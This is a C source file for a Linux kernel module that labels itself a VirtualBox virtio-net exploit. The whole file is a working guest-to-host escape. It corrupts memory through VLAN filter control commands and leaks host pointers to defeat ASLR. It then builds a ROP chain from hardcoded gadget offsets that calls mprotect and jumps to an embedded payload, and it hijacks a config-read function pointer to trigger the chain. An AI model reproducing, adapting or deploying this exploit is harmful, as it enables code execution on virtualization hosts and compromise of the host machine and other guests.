#include <linux/mman.h>
#include <linux/module.h>
#include <linux/pci.h>
#include <linux/virtio_net.h>
#include <linux/virtio_pci.h>

#include "payload.h"

MODULE_AUTHOR("Andy Nguyen");
MODULE_DESCRIPTION("VirtualBox virtio-net exploit");
MODULE_LICENSE("GPL");

#define RELEASE

#ifdef RELEASE  // r158379

#define BAR_OFF 0x4
#define OFFSET_OFF 0x8
#define LENGTH_OFF 0xc

#define OFF_MMIO_OFF 0x0
#define CB_MMIO_OFF 0x2

#define DEV_INS_R3_OFF 0x40
#define PFN_CONFIG_READ_OFF 0x58

#define VIRTQUEUE_SIZE 0x48

#define VIRTQUEUES_OFF 0x20
#define PCI_CFG_DATA_OFF_OFF 0x707
#define VIRTQ_SELECT_OFF 0x70a
#define LOC_COMMON_CFG_CAP_OFF 0x724
#define LOC_DEVICE_CAP_OFF 0x734

#define VLAN_FILTER_OFF 0xf94
#define FAKE_VIRTIOCORE_OFF 0x2000
#define FAKE_PCICAP_OFF 0x2300
#define PCI_DEV_INT_OFF 0x2100

#define ROP_OFF 0x2200
#define PAYLOAD_OFF 0x2400
#define STACK_OFF 0x2400

// VBoxRT.so

#define MPROTECT 0x816c0
#define RT_FILE_QUERY_SIZE 0x2370f0

// VBoxDD.so

#define RT_FILE_QUERY_SIZE_PLT 0x570028

#define VIRTIO_R3_PCI_CONFIG_READ_OFF 0x16c330

// 0x000000000016a8ea : push rdi ; jmp qword ptr [rsi - 0x77]
#define PUSH_RDI_JMP_QWORD_PTR_RSI_MINUS_77 0x000000000016a8ea
// 0x0000000000195036 : pop rsp ; ret
#define POP_RSP_RET 0x0000000000195036

// 0x00000000000e88f4 : pop rax ; ret
#define POP_RAX_RET 0x00000000000e88f4
// 0x0000000000054d33 : pop rdi ; add al, 0x89 ; ret
#define POP_RDI_ADD_AL_89_RET 0x0000000000054d33
// 0x000000000010ec0e : pop rsi ; ret
#define POP_RSI_RET 0x000000000010ec0e
// 0x000000000009f7f3 : pop rdx ; ret
#define POP_RDX_RET 0x000000000009f7f3

// 0x0000000000205798 : mov qword ptr [rsi], rax ; ret
#define MOV_QWORD_PTR_RSI_RAX_RET 0x0000000000205798
// 0x000000000022e6f8 : mov rax, qword ptr [rax] ; ret
#define MOV_RAX_QWORD_PTR_RAX_RET 0x000000000022e6f8
// 0x00000000000d7d02 : add rax, rsi ; ret
#define ADD_RAX_RSI_RET 0x00000000000d7d02

#endif

#define VIRTIO_REGION_PCI_CAP 2

struct virtio_pci_device {
  struct virtio_device vdev;
  struct pci_dev *pci_dev;
};

static struct virtio_pci_device *to_vp_device(struct virtio_device *vdev) {
  return container_of(vdev, struct virtio_pci_device, vdev);
}

struct control_buf {
  struct virtio_net_ctrl_hdr hdr;
  virtio_net_ctrl_ack status;
  __virtio16 vid;
};

struct virtexp_info {
  struct virtio_device *vdev;
  struct virtio_pci_device *vp_dev;
  struct virtqueue *vqs[3];
  struct control_buf *ctrl;
};

static void write_bits(struct virtexp_info *vi, u16 off, u64 val,
                       unsigned bits) {
  struct scatterlist sgs[3];
  struct scatterlist *psgs[3];
  unsigned tmp;
  unsigned i;

  for (i = 0; i < bits; i++) {
    vi->ctrl->hdr.class = VIRTIO_NET_CTRL_VLAN;
    vi->ctrl->hdr.cmd = (val & (1LL << i) ? VIRTIO_NET_CTRL_VLAN_ADD
                                          : VIRTIO_NET_CTRL_VLAN_DEL);
    vi->ctrl->vid = cpu_to_virtio16(vi->vdev, (off - VLAN_FILTER_OFF) * 8 + i);
    vi->ctrl->status = ~0;

    sg_init_one(&sgs[0], &vi->ctrl->hdr, sizeof(vi->ctrl->hdr));
    // Size needs + 3 because there is a bug in VirtualBox
    sg_init_one(&sgs[1], &vi->ctrl->vid, sizeof(vi->ctrl->vid) + 3);
    sg_init_one(&sgs[2], &vi->ctrl->status, sizeof(vi->ctrl->status));

    psgs[0] = &sgs[0];
    psgs[1] = &sgs[1];
    psgs[2] = &sgs[2];

    virtqueue_add_sgs(vi->vqs[2], psgs, 2, 1, vi, GFP_ATOMIC);

    virtqueue_kick(vi->vqs[2]);

    while (!virtqueue_get_buf(vi->vqs[2], &tmp) &&
           !virtqueue_is_broken(vi->vqs[2]))
      cpu_relax();
  }
}

static void write64(struct virtexp_info *vi, u16 off, u64 val) {
  return write_bits(vi, off, val, 64);
}

static void write32(struct virtexp_info *vi, u16 off, u32 val) {
  return write_bits(vi, off, val, 32);
}

static void write16(struct virtexp_info *vi, u16 off, u16 val) {
  return write_bits(vi, off, val, 16);
}

static void write8(struct virtexp_info *vi, u16 off, u8 val) {
  return write_bits(vi, off, val, 8);
}

static void prepare_read_config(struct virtexp_info *vi, u32 off, u32 len) {
  // Fake VIRTIOCORE
  write8(vi, FAKE_VIRTIOCORE_OFF + PCI_CFG_DATA_OFF_OFF, 0);
  write16(vi, FAKE_VIRTIOCORE_OFF + VIRTQ_SELECT_OFF,
          ((PCI_DEV_INT_OFF + DEV_INS_R3_OFF) -
           (FAKE_VIRTIOCORE_OFF + VIRTQUEUES_OFF)) /
              VIRTQUEUE_SIZE);
  write16(vi, FAKE_VIRTIOCORE_OFF + LOC_COMMON_CFG_CAP_OFF + OFF_MMIO_OFF, 0);
  write16(vi, FAKE_VIRTIOCORE_OFF + LOC_COMMON_CFG_CAP_OFF + CB_MMIO_OFF,
          0xffff);
  write16(vi, FAKE_VIRTIOCORE_OFF + LOC_DEVICE_CAP_OFF + OFF_MMIO_OFF, 0);
  write16(vi, FAKE_VIRTIOCORE_OFF + LOC_DEVICE_CAP_OFF + CB_MMIO_OFF, 0);

  // Fake VIRTIO_PCI_CAP_T
  write8(vi, FAKE_PCICAP_OFF + BAR_OFF, VIRTIO_REGION_PCI_CAP);
  write32(vi, FAKE_PCICAP_OFF + OFFSET_OFF, off);
  write32(vi, FAKE_PCICAP_OFF + LENGTH_OFF, len);

  // Partially corrupt pDevInsR3 pointer to cause a type confusion:
  // - pvInstanceDataR3 (0x18) -> pCritSectRoR3 (0x28)
  // - pPciCfgCap (0x1a8) -> pCommonCfgCap (0x1b8)
  write8(vi, PCI_DEV_INT_OFF + DEV_INS_R3_OFF, 0x10);
}

static u32 read_config32(struct virtexp_info *vi, u32 off) {
  u32 val;
  prepare_read_config(vi, off, sizeof(val));
  pci_read_config_dword(vi->vp_dev->pci_dev, 0, &val);
  return val;
}

static u16 read_config16(struct virtexp_info *vi, u32 off) {
  u16 val;
  prepare_read_config(vi, off, sizeof(val));
  pci_read_config_word(vi->vp_dev->pci_dev, 0, &val);
  return val;
}

static void escape(struct virtexp_info *vi) {
  u64 pDevInsR3;
  u64 virtioR3PciConfigRead;
  u64 VBoxDD_base;
  unsigned tmp;
  unsigned i;

  // STAGE 1: Leak pointers

  pDevInsR3 = (u64)read_config32(vi, VIRTIO_PCI_COMMON_Q_DESCHI) << 32 |
              (u64)read_config32(vi, VIRTIO_PCI_COMMON_Q_DESCLO);
  pDevInsR3 -= 0x10;
  printk("pDevInsR3: %llx\n", pDevInsR3);

  virtioR3PciConfigRead =
      (u64)read_config16(vi, VIRTIO_PCI_COMMON_Q_SIZE) << 48 |
      (u64)read_config16(vi, VIRTIO_PCI_COMMON_Q_NOFF) << 32 |
      (u64)read_config16(vi, VIRTIO_PCI_COMMON_Q_ENABLE) << 16 |
      (u64)read_config16(vi, VIRTIO_PCI_COMMON_Q_MSIX);
  printk("virtioR3PciConfigRead: %llx\n", virtioR3PciConfigRead);

  VBoxDD_base = virtioR3PciConfigRead - VIRTIO_R3_PCI_CONFIG_READ_OFF;
  printk("VBoxDD_base: %llx\n", VBoxDD_base);

  // STAGE 2: Build ROP chain

  // Copy payload
  for (i = 0; i < payload_bin_len; i++) {
    write8(vi, PAYLOAD_OFF + i, payload_bin[i]);
  }

  // Dynamically resolve mprotect
  write64(vi, ROP_OFF + 0x00, VBoxDD_base + POP_RAX_RET);
  write64(vi, ROP_OFF + 0x08, VBoxDD_base + RT_FILE_QUERY_SIZE_PLT);
  write64(vi, ROP_OFF + 0x10, VBoxDD_base + MOV_RAX_QWORD_PTR_RAX_RET);
  write64(vi, ROP_OFF + 0x18, VBoxDD_base + POP_RSI_RET);
  write64(vi, ROP_OFF + 0x20, -RT_FILE_QUERY_SIZE + MPROTECT);
  write64(vi, ROP_OFF + 0x28, VBoxDD_base + ADD_RAX_RSI_RET);
  write64(vi, ROP_OFF + 0x30, VBoxDD_base + POP_RSI_RET);
  write64(vi, ROP_OFF + 0x38, pDevInsR3 + ROP_OFF + 0x78);
  write64(vi, ROP_OFF + 0x40, VBoxDD_base + MOV_QWORD_PTR_RSI_RAX_RET);

  // Call mprotect
  write64(vi, ROP_OFF + 0x48, VBoxDD_base + POP_RDI_ADD_AL_89_RET);
  write64(vi, ROP_OFF + 0x50, pDevInsR3 + 0x2000);
  write64(vi, ROP_OFF + 0x58, VBoxDD_base + POP_RSI_RET);
  write64(vi, ROP_OFF + 0x60, 0x1000);
  write64(vi, ROP_OFF + 0x68, VBoxDD_base + POP_RDX_RET);
  write64(vi, ROP_OFF + 0x70, PROT_READ | PROT_WRITE | PROT_EXEC);
  write64(vi, ROP_OFF + 0x78, 0xDEADBEEF);  // mprotect

  // Jump to payload
  write64(vi, ROP_OFF + 0x80, VBoxDD_base + POP_RDI_ADD_AL_89_RET);
  write64(vi, ROP_OFF + 0x88, VBoxDD_base);
  write64(vi, ROP_OFF + 0x90, VBoxDD_base + POP_RSI_RET);
  write64(vi, ROP_OFF + 0x98, pDevInsR3 + STACK_OFF);
  write64(vi, ROP_OFF + 0xa0, pDevInsR3 + PAYLOAD_OFF);

  // STAGE 3: Code execution

  // Corrupt pDevInsR3 pointer
  write64(vi, PCI_DEV_INT_OFF + DEV_INS_R3_OFF, pDevInsR3 + ROP_OFF);

  // Corrupt pfnConfigRead pointer
  write64(vi, PCI_DEV_INT_OFF + PFN_CONFIG_READ_OFF,
          VBoxDD_base + PUSH_RDI_JMP_QWORD_PTR_RSI_MINUS_77);

  // Set stack pivot gadget
  write64(vi, PCI_DEV_INT_OFF - 0x77, VBoxDD_base + POP_RSP_RET);

  // Trigger pfnConfigRead dereference
  pci_read_config_dword(vi->vp_dev->pci_dev, 0, &tmp);
}

static int exploit_probe(struct virtio_device *vdev) {
  static vq_callback_t *callbacks[] = {NULL, NULL, NULL};
  static const char *names[] = {"rx", "tx", "ctrl"};
  struct virtexp_info *vi;
  int ret;

  vi = kzalloc(sizeof(struct virtexp_info), GFP_KERNEL);
  if (!vi) return -ENOMEM;

  vi->ctrl = kzalloc(sizeof(struct control_buf), GFP_KERNEL);
  if (!vi->ctrl) return -ENOMEM;

  vi->vp_dev = to_vp_device(vdev);

  vi->vdev = vdev;
  vdev->priv = vi;

  ret = virtio_find_vqs(vdev, 3, vi->vqs, callbacks, names, NULL);
  if (ret) return ret;

  virtio_device_ready(vdev);

  escape(vi);

  return 0;
}

static void exploit_remove(struct virtio_device *vdev) {
  struct virtexp_info *vi = vdev->priv;

  vdev->config->reset(vdev);
  vdev->config->del_vqs(vdev);
  kfree(vi->ctrl);
  kfree(vi);
}

static struct virtio_device_id exploit_ids[] = {
    {
        VIRTIO_ID_NET,
        VIRTIO_DEV_ANY_ID,
    },
    {0},
};

static unsigned int features[] = {};

static struct virtio_driver exploit = {
    .feature_table = features,
    .feature_table_size = ARRAY_SIZE(features),
    .driver.name = "exploit",
    .driver.owner = THIS_MODULE,
    .id_table = exploit_ids,
    .probe = exploit_probe,
    .remove = exploit_remove,
};

module_virtio_driver(exploit);
MODULE_DEVICE_TABLE(virtio, exploit_ids);
